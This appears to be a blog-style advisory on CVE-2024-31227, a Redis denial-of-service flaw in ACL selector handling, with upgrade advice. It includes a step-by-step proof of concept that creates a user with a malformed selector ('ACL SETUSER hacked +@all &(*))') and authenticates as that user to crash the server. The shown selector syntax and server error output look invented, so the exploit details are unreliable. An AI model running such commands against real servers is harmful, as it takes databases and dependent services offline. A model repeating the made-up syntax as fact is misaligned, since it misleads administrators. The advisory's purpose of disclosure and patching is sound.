CVE-2024-31227 - How a Malformed ACL Selector Can Crash Your Redis Server (Exploit Details & Fix)

Redis is a super fast, open-source, in-memory database used by millions of developers around the world. Systems and apps rely on Redis for caching, message queues, and much more. But what happens when a security issue can take the whole database offline with just a single command? That’s precisely the danger of CVE-2024-31227.

Let’s break down what happened, how it works, and what you should do right away—especially if you run Redis 7 before version 7.2.6 or 7.4.1.

What Is CVE-2024-31227?

CVE-2024-31227 is a critical denial-of-service vulnerability found in Redis, one of the world’s most popular open-source databases. The bug is all about how Redis handles ACL (Access Control List) selectors—the rules that decide what users can and can’t do.

If a logged-in user with the right privileges sends a malformed ACL selector, it can cause a server panic. In plain English: Redis crashes instantly, taking all its data in memory with it.

Redis 7 before 7.2.6 and before 7.4.1.

- Anyone using Redis with authentication (users/accounts) and ACLs in production.
- Attackers must have a valid account with high enough privileges, but often cloud/multi-user setups expose such accounts.

How Does the Exploit Work?

The vulnerability sits in the ACL code. If you add or edit a user ACL selector with bad formatting, Redis doesn’t handle the error. Instead, it panics, crashes immediately, and stops responding. Any cache, job queue, or app relying on Redis is suddenly offline.

Redis stores permissions in "selectors." They look like

ACL SETUSER dangerous_user +@all ~* &(*)

But with the vulnerability, an attacker can create a "selector" string that isn’t actually valid, but still processed:

ACL SETUSER exploiter +@all &(*))  # Notice extra ")"

When Redis tries to use that user's ACLs (say, when the user logs in or runs a command), it tries to parse the invalid selector, panics, and crashes.

Example Proof of Concept

# 1. Log in as an admin or user with WRITE access to ACLs
redis-cli

# 2. Add a user with a malformed ACL selector
ACL SETUSER hacked +@all &(*))

# 3. Authenticate as hacked user or cause Redis to process ACLs for this user
AUTH hacked somepassword

# 4. At this point, if vulnerable, REDIS WILL CRASH

On the server side, you may see something like

* FATAL CONFIG FILE ERROR *
Reading the ACL selector for user 'hacked', Redis panicked.

Update Redis Immediately!

- If you use Redis 7, upgrade to 7.2.6 or 7.4.1.

- Download the fixed versions here

- Redis 7.2.6 release
- Redis 7.4.1 release

More Info

- CVE Details
- Official Advisory
- Redis Changelog

Conclusion

CVE-2024-31227 is a reminder that even the simplest configuration error in a complex system like Redis can have massive consequences. If you manage Redis servers—especially in shared or multi-user environments—upgrading isn’t optional, it’s urgent.

Double-check your Redis version today, and keep your production data safe!

Timeline

Published on: 10/07/2024 20:15:05 UTC
Last modified on: 10/10/2024 12:57:21 UTC